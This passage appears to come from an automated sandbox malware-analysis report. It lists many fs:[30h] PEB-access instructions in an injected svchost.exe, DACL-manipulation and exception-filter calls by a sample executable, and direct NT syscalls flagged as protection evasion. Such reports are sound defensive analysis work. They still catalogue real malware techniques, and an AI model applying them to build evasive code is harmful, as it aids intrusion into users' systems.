                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB019F mov eax, dword ptr fs:[00000030h]8_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2A197 mov eax, dword ptr fs:[00000030h]8_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2A197 mov eax, dword ptr fs:[00000030h]8_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2A197 mov eax, dword ptr fs:[00000030h]8_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F70185 mov eax, dword ptr fs:[00000030h]8_2_02F70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEC188 mov eax, dword ptr fs:[00000030h]8_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEC188 mov eax, dword ptr fs:[00000030h]8_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD4180 mov eax, dword ptr fs:[00000030h]8_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD4180 mov eax, dword ptr fs:[00000030h]8_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2C156 mov eax, dword ptr fs:[00000030h]8_2_02F2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC8158 mov eax, dword ptr fs:[00000030h]8_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36154 mov eax, dword ptr fs:[00000030h]8_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36154 mov eax, dword ptr fs:[00000030h]8_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC4144 mov eax, dword ptr fs:[00000030h]8_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC4144 mov eax, dword ptr fs:[00000030h]8_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC4144 mov ecx, dword ptr fs:[00000030h]8_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC4144 mov eax, dword ptr fs:[00000030h]8_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC4144 mov eax, dword ptr fs:[00000030h]8_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F60124 mov eax, dword ptr fs:[00000030h]8_2_02F60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDA118 mov ecx, dword ptr fs:[00000030h]8_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDA118 mov eax, dword ptr fs:[00000030h]8_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDA118 mov eax, dword ptr fs:[00000030h]8_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDA118 mov eax, dword ptr fs:[00000030h]8_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF0115 mov eax, dword ptr fs:[00000030h]8_2_02FF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov eax, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov ecx, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov eax, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov eax, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov ecx, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov eax, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov eax, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov ecx, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov eax, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov ecx, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]8_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]8_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]8_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]8_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB06F1 mov eax, dword ptr fs:[00000030h]8_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB06F1 mov eax, dword ptr fs:[00000030h]8_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]8_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]8_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F666B0 mov eax, dword ptr fs:[00000030h]8_2_02F666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]8_2_02F6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F34690 mov eax, dword ptr fs:[00000030h]8_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F34690 mov eax, dword ptr fs:[00000030h]8_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F62674 mov eax, dword ptr fs:[00000030h]8_2_02F62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF866E mov eax, dword ptr fs:[00000030h]8_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF866E mov eax, dword ptr fs:[00000030h]8_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A660 mov eax, dword ptr fs:[00000030h]8_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A660 mov eax, dword ptr fs:[00000030h]8_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4C640 mov eax, dword ptr fs:[00000030h]8_2_02F4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E627 mov eax, dword ptr fs:[00000030h]8_2_02F4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F66620 mov eax, dword ptr fs:[00000030h]8_2_02F66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F68620 mov eax, dword ptr fs:[00000030h]8_2_02F68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3262C mov eax, dword ptr fs:[00000030h]8_2_02F3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72619 mov eax, dword ptr fs:[00000030h]8_2_02F72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE609 mov eax, dword ptr fs:[00000030h]8_2_02FAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F347FB mov eax, dword ptr fs:[00000030h]8_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F347FB mov eax, dword ptr fs:[00000030h]8_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F527ED mov eax, dword ptr fs:[00000030h]8_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F527ED mov eax, dword ptr fs:[00000030h]8_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F527ED mov eax, dword ptr fs:[00000030h]8_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]8_2_02FBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]8_2_02F3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB07C3 mov eax, dword ptr fs:[00000030h]8_2_02FB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F307AF mov eax, dword ptr fs:[00000030h]8_2_02F307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE47A0 mov eax, dword ptr fs:[00000030h]8_2_02FE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD678E mov eax, dword ptr fs:[00000030h]8_2_02FD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F38770 mov eax, dword ptr fs:[00000030h]8_2_02F38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F30750 mov eax, dword ptr fs:[00000030h]8_2_02F30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBE75D mov eax, dword ptr fs:[00000030h]8_2_02FBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72750 mov eax, dword ptr fs:[00000030h]8_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72750 mov eax, dword ptr fs:[00000030h]8_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB4755 mov eax, dword ptr fs:[00000030h]8_2_02FB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6674D mov esi, dword ptr fs:[00000030h]8_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6674D mov eax, dword ptr fs:[00000030h]8_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6674D mov eax, dword ptr fs:[00000030h]8_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6273C mov eax, dword ptr fs:[00000030h]8_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6273C mov ecx, dword ptr fs:[00000030h]8_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6273C mov eax, dword ptr fs:[00000030h]8_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAC730 mov eax, dword ptr fs:[00000030h]8_2_02FAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6C720 mov eax, dword ptr fs:[00000030h]8_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6C720 mov eax, dword ptr fs:[00000030h]8_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F30710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F60710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6C700 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03004500 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F304E5 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F644B0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F364AB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FEA49A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F5A470 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FBC460 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FEA456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F2645D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F5245A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6E443 mov eax, dword ptr fs:[00000030h] (8 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6A430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F2E420 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F2C427 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FB6420 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F68402 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] (8 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F325E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6C5ED mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F365D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6A5D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6E5CF mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F545B1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FB05A7 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6E59C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F32582 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F32582 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F64588 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6656A mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F38550 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F40535 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F5E53E mov eax, dword ptr fs:[00000030h] (5 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FC6500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F30AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F64AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F86ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F38AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F86AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F68A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F3EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FDEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F36A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F40A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F54A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F5EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FBCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F38BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F5EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F50BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F30BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F40BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FE4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03004A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F2CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FDEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FE4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FC6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FD8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FFAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F5EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FF8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FAEB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FBC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F30887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FBE872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FC6870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F60854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F34859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F42840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F52835 mov eax, dword ptr fs:[00000030h] (5 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F52835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FD483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FBC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FC69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FB89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FB89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FD4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FBC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F56962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F7096E mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F7096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FB0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FB892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FC892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FBC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F28918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FAE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F68EF5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F36EE0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0092A66C GetSecurityDescriptorDacl, _memset, GetAclInformation, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_00918189 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_009181AC SetUnhandledExceptionFilter, UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtOpenKeyEx: Direct from: 0x77672B9C
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtProtectVirtualMemory: Direct from: 0x77672F9C
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtCreateFile: Direct from: 0x77672FEC
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtOpenFile: Direct from: 0x77672DCC
